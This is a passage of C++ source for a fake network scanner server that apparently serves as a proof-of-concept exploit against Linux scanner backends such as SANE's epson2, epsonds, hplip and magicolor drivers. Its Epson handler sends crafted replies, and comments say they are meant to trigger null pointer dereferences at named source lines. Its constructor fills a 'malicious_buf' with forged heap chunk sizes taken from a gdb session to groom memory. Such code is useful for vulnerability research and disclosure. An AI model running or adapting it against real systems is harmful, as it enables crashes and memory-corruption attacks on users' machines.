    } else if (buf_size_ == 12 && memcmp(buf, "FIN x0000000", 12) == 0 && reply_len_ == 64) {
      char reply[76] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
          'F','I','N',' ','x',0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
        };
      unsigned int more = 0;
      snprintf(&reply[17], sizeof(reply) - 17, "%07x#---", more);
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }

      state_ = H_wait_hdr;
      return 12;
    } else if (buf_size_ == 12 && memcmp(buf, "TRDTx0000000", 12) == 0 && reply_len_ == 64) {
      char reply[76] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
          'T','R','D','T','x',0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
        };
      unsigned int more = 0;
      snprintf(&reply[17], sizeof(reply) - 17, "%07x#---", more);
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }

      state_ = H_wait_hdr;
      return 12;
    } else if (buf_size_ == 12 && memcmp(buf, "IMG x0000000", 12) == 0 && reply_len_ == 64) {
      char reply[76] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
          'I','M','G',' ','x',0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
          0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
        };

      // Announce that we're going to send an image with 0x10000000 bytes.
      // The payload will be sent by `send_img_response()`.
      unsigned int more = 0x10000000;
      snprintf(&reply[17], sizeof(reply) - 17, "%08x#---", more);
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }

      state_ = H_wait_hdr;
      payload_state_ = P_img;
      return 12;
    } else if (buf_size_ == 12 && memcmp(buf, "PARAx", 5) == 0 && reply_len_ == 0) {
      char reply[] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 0, 0, 0};
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
      state_ = H_wait_hdr;
      payload_state_ = P_paramblock;
      return 12;
    } else if (buf_size_ == 12 && memcmp(buf, "PARAx", 5) == 0) {
      char reply[] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
          'P','A','R','A','x','0','0','0','0','0','0','0','#','-','-','-'
        };
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
      if (reply_len_ > sizeof(reply)) {
        // Pad the reply with zeros up to the requested length. calloc
        // provides the zero fill; the buffer is freed once it has been
        // sent, and allocation failure is reported instead of crashing.
        const size_t size = reply_len_ - sizeof(reply);
        char* const reply2 = static_cast<char*>(calloc(size, 1));
        if (reply2 == nullptr) {
          printf("out of memory.\n");
        } else {
          if (sock.reply(reply2, size) < 0) {
            printf("send failed.\n");
          }
          free(reply2);
        }
      }
      state_ = H_wait_hdr;
      return 12;
    } else {
      // `buf` is raw network data with no terminating NUL, so bound the
      // print by the payload size instead of using a bare %s.
      const int shown =
        static_cast<int>(std::min<uint32_t>(buf_size_, 0x7fffffffu));
      printf(
        "eds_send unrecognized command: %.*s\nbuf_size=%u reply_len=%u\n",
        shown, reinterpret_cast<const char*>(buf), buf_size_, reply_len_);
      return -1;
    }
  }

  // Handle an 0x2100 (net_lock) command that carries a payload.
  ssize_t net_lock(SocketHandlerTCP& sock, const uint8_t* buf) {
    printf("net_lock\n");
    if (mode_ == 1) {
      // Trigger a null pointer exception at epsonds-net.c:160
      const char reply[15] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 0, 0, 0, 'K'};
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }

      state_ = H_wait_hdr;
      return 12;
    }

    if (buf_size_ != 7) {
      printf("net_lock unexpected buf_size: %u\n", buf_size_);
      return -1;
    }
    if (memcmp(buf, "\x01\xa0\x04\x00\x00\x01\x2c", 7) != 0) {
      printf("net_lock unexpected payload\n");
      return -1;
    }
    return send_ack(sock);
  }

  // Handle an empty 0x2100 command (the epson2 backend's lock request).
  ssize_t net_lock_epson2(SocketHandlerTCP& sock) {
    printf("net_lock_epson2\n");
    if (mode_ == 0) {
      // Trigger a null pointer dereference at epson2_net.c:141
      const char reply[13] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 0, 0, 0, 'K'};
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
    }
    state_ = H_wait_hdr;
    return 12;
  }

public:
  explicit EpsonHandlerTCP(int mode) :
    mode_(mode), state_(H_wait_hdr), payload_state_(P_normal), cmd_(0),
    buf_size_(0), reply_len_(0)
  {
    const size_t size = sizeof(malicious_buf);
    memset(malicious_buf, 0, size-1);
    malicious_buf[size-1] = 0xf0;
    malicious_buf[0] = 'I';
    malicious_buf[1] = 'S';
    store_be32(&malicious_buf[6], static_cast<uint32_t>(size-12));
    // try to recreate the original heap structure by inserting
    // valid-looking chunk sizes at appropriate offsets. (I got
    // these chunk sizes from a debug session in gdb.)
    size_t offset = 12 + 0x220 + 8;
    static const size_t offsets[] =
      { 0x40, 0x30, 0x20, 0x50, 0x20, 0x800, 0x70, 0x20,
        0xa0, 0x70, 0x20, 0x60, 0x20, 0x20, 0x70, 0x20,
        0x70, 0x20, 0x60, 0x70, 0x20, 0x20, 0x60, 0x70,
        0x30, 0x20, 0x60, 0x30, 0x40, 0x30, 0x30, 0x30,
        0x90, 0 };
    for (size_t i = 0; offsets[i] != 0; i++) {
      // memcpy: offset is not size_t-aligned, so a size_t* store is UB.
      const size_t chunk_size = offsets[i] + 5;
      memcpy(&malicious_buf[offset], &chunk_size, sizeof(chunk_size));
      offset += offsets[i];
    }
  }

  virtual ~EpsonHandlerTCP() {}

  virtual ssize_t accept(SocketHandlerTCP& sock) override {
    printf("Sending welcome message.\n");

    // Send back a welcome message. To hit the code in epson2.c, the
    // payload needs to be 5 bytes; to hit the code in epsonds.c, it
    // needs to be 3 bytes.
    if (mode_ == 0) {
      // Send back a 5-byte payload to hit the code in epson2.c
      const char reply[17] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 5, 0, 0, 'K','E','V','I','N'};
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
    } else {
      const char reply[15] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 3, 0, 0, 'K','E','V'};
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }
    }

    state_ = H_wait_hdr;
    return 12;
  }

  // Process the bytes requested by the previous call: a header, an extended
  // header or a payload, depending on state_. Returns the number of bytes
  // to wait for next, or -1 to close the connection.
  virtual ssize_t receive(SocketHandlerTCP& sock, const uint8_t* buf) override {
    switch (state_) {
    case H_wait_hdr:
      // Parse the header. (First 12 bytes.)
      if (buf[0] != 'I' || buf[1] != 'S' || buf[4] != 0 || buf[5] != 12) {
        printf("EPSON message has malformed header.\n");
        return -1;
      }

      cmd_ = static_cast<uint16_t>((buf[2] << 8) | buf[3]);
      if ((cmd_ & 0xFF00) == 0x2000) {
        // There will be an extended header.
        state_ = H_wait_extra_hdr;
        return 8;
      }
      buf_size_ = load_be32(&buf[6]);
      reply_len_ = 0;
      if (buf_size_ == 0 && cmd_ == 0x2100) {
        return net_lock_epson2(sock);
      }
      state_ = H_wait_payload;
      return buf_size_;

    case H_wait_extra_hdr:
      buf_size_ = load_be32(&buf[0]);
      reply_len_ = load_be32(&buf[4]);
      if (buf_size_ == 0 && payload_state_ == P_img) {
        return send_img_response(sock);
      }
      state_ = H_wait_payload;
      return buf_size_;

    case H_wait_moreinfo:
      // This case is triggered if we specified a non-zero "more" value in
      // the initial reply.

      // Parse the header. (First 12 bytes.)
      if (buf[0] != 'I' || buf[1] != 'S' || buf[4] != 0 || buf[5] != 12) {
        printf("EPSON message has malformed header.\n");
        return -1;
      }

      cmd_ = static_cast<uint16_t>((buf[2] << 8) | buf[3]);
      buf_size_ = load_be32(&buf[6]);
      printf("more INFO: %x %x\n", cmd_, buf_size_);
      buf_size_ = load_be32(&buf[12]);
      reply_len_ = load_be32(&buf[16]);
      printf("more INFO extra: %x %x\n", buf_size_, reply_len_);

      send_info_harmless(sock, 0);
      state_ = H_wait_hdr;
      return 12;

    case H_wait_payload:
      switch (payload_state_) {
      case P_normal:
        switch (cmd_) {
        case 0x2000: // eds_send
          return eds_send(sock, buf);
        case 0x2100: // net_lock
          return net_lock(sock, buf);
        default:
          printf("Unknown EPSON command: 0x%x\n", cmd_);
          return -1;
        }
      case P_paramblock:
        return send_para_response(sock);
      default:
        printf("Invalid EPSON payload state: %d\n", payload_state_);
        return -1;
      }

    default:
      printf("Invalid EPSON header state: %d\n", state_);
      return -1;
    }
  }

  virtual void disconnect() override {}
};

// Factory for EpsonHandlerTCP objects. It remembers the mode number chosen on
// the command line and hands that same mode to every handler it builds.
class BuildEpsonHandlerTCP : public BuildRecvHandlerTCP {
public:
  explicit BuildEpsonHandlerTCP(int mode) : mode_{mode} {}

  // Creates a fresh handler with a new-allocated object. The peer address
  // arguments are not used. NOTE(review): presumably the caller takes
  // ownership of the returned pointer — confirm against BuildRecvHandlerTCP.
  RecvHandlerTCP* build(sockaddr* /*addr*/, socklen_t /*addrlen*/) override {
    RecvHandlerTCP* const handler = new EpsonHandlerTCP(mode_);
    return handler;
  }

private:
  // Mode number forwarded to each EpsonHandlerTCP.
  const int mode_;
};

int main(int argc, char* argv[]) {
  if (argc < 2) {
    const char* prog = argc > 0 ? argv[0] : "fakescanner";
    fprintf(
      stderr,
      "usage: %s <command>\n"
      "commands: hplip [0-2], epson [0-8], magicolor\n",
      prog
    );
    exit(EXIT_FAILURE);
  }

  const char* command = argv[1];

  const int epollfd = epoll_create1(0);
  if (epollfd == -1) {
    fprintf(stderr, "Call to epoll_create1 failed.\n");
    exit(EXIT_FAILURE);
  }

  if (strcmp(command, "magicolor") == 0) {
    if (EpollRecvHandlerUDP::build(
          epollfd,
          create_and_bind_udp(161),
          new SNMPHandlerUDP()) < 0) {
      fprintf(stderr, "Failed to bind UDP port 161.\n");
      exit(EXIT_FAILURE);
    }
    if (EpollTcpConnectHandler::build(
          epollfd,
          create_bind_and_listen_tcp(4567),
          new BuildMagicolorHandlerTCP()) < 0) {
      fprintf(stderr, "Failed to bind UDP port 4567.\n");
      exit(EXIT_FAILURE);
    }
  } else if (strcmp(command, "hplip") == 0) {
    if (argc != 3) {
      fprintf(
        stderr,
        "usage: %s hplip [0-2]\n"
        "You need to include a mode number.\n",
        argv[0]
      );
      exit(EXIT_FAILURE);
    }
    const int mode = atoi(argv[2]);
    if (EpollRecvHandlerUDP::build(
          epollfd,
          create_and_bind_udp(5353),
          new HplipHandler(mode)) < 0) {
      fprintf(stderr, "Failed to bind UDP port 5353.\n");
      exit(EXIT_FAILURE);
    }
  } else if (strcmp(command, "epson") == 0) {
    if (argc != 3) {
      fprintf(
        stderr,
        "usage: %s epson [0-8]\n"
        "You need to include a mode number.\n",
        argv[0]
      );
      exit(EXIT_FAILURE);
    }
    const int mode = atoi(argv[2]);
    if (EpollRecvHandlerUDP::build(
          epollfd,
          create_and_bind_udp(3289),
          new EpsonHandlerUDP()) < 0) {
      fprintf(stderr, "Failed to bind UDP port 3289.\n");
      exit(EXIT_FAILURE);
    }
    if (EpollTcpConnectHandler::build(
          epollfd,
          create_bind_and_listen_tcp(1865),
          new BuildEpsonHandlerTCP(mode)) < 0) {
      fprintf(stderr, "Failed to bind UDP port 1865.\n");
      exit(EXIT_FAILURE);
    }
  } else {
    fprintf(stderr, "Unrecognized command: %s\n", command);
    exit(EXIT_FAILURE);
  }

  while (1) {
    const size_t max_events = 10;
    epoll_event events[max_events];
    const int numevents = epoll_wait(epollfd, events, max_events, -1);
    int eventidx;
    for (eventidx = 0; eventidx < numevents; eventidx++) {
      epoll_event *ev = &events[eventidx];
      EPollHandlerInterface *handler = (EPollHandlerInterface *)ev->data.ptr;

      if (ev->events & (EPOLLERR | EPOLLHUP)) {
        printf("epoll error 0x%x on handler=%p\n", ev->events, handler);
        delete handler;  // This also closes the file descriptor
        continue;
      }

      if (!(ev->events & EPOLLIN)) {
        // No input to process.
        continue;
      }

      if (handler->process_read(ev) < 0) {
        printf("shutdown handler=%p\n", handler);
        delete handler;  // This also closes the file descriptor
        continue;
      }
    }
  }

  return 0;
}
